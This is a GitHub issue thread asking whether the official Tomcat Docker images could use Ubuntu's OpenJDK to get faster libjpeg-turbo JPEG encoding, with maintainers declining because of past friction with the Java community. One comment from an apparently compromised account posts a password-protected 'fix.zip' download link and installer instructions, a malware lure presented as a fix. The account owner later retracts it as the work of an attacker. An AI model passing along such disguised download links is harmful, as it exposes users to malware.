### ISSUE TITLE
Consider packaging Tomcat along with the Ubuntu own Java runtime (3x speedup in JPEG encoding)

### ISSUE THREAD

**Issue by aaime** [docker-library/tomcat#320]
Testing [GeoServer](www.geoserver.org) running inside the Tomcat official docker images, I've found it to be significantly slower at generating JPEG outputs compared to my local developer machine (Linux Mint).

I've tracked the difference down to the usage of libjpeg-turbo, by default, in the operating system JDK packages, while Temurin builds are using an older JPEG library, embedded directly in the runtime. I've reported this to the Temurin base images, but just in case, I wanted to let you know as well:
https://github.com/adoptium/containers/issues/641

In case the suggestion does not get traction upstream, would it make sense to have Tomcat packaged with just the Ubuntu OpenJDK runtime instead?

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by tianon** [comment]
We had a _lot_ of friction with the Java community when the https://hub.docker.com/_/openjdk images were built on the distro-provided OpenJDK packages, so we're not likely to repeat that for anything intended to provide Java (like Tomcat is).

You might also be interested in (testing?) builds from #299.

**Comment by aaime** [comment]
@tianon thanks for sharing the builds at #299. I don't see any Tomcat 9 build that uses the Linux distribution own JDK, could you confirm?

I've also searched over the OpenJDK bug tracker, I don't see anything related to using libjpeg turbo directly in OpenJDK (as a replacement for the current JPEG library).

In the meantime, Temurin contributors confirmed the performance difference with their own testing, along with the difficulty of having a Temurin build that targets the specific platform, rather than being self-contained (and missing the libjpeg-turbo link).

**Comment by tianon** [comment]
Yes, that is correct -- as noted above, we don't plan to provide that particular combination, unfortunately. :disappointed:
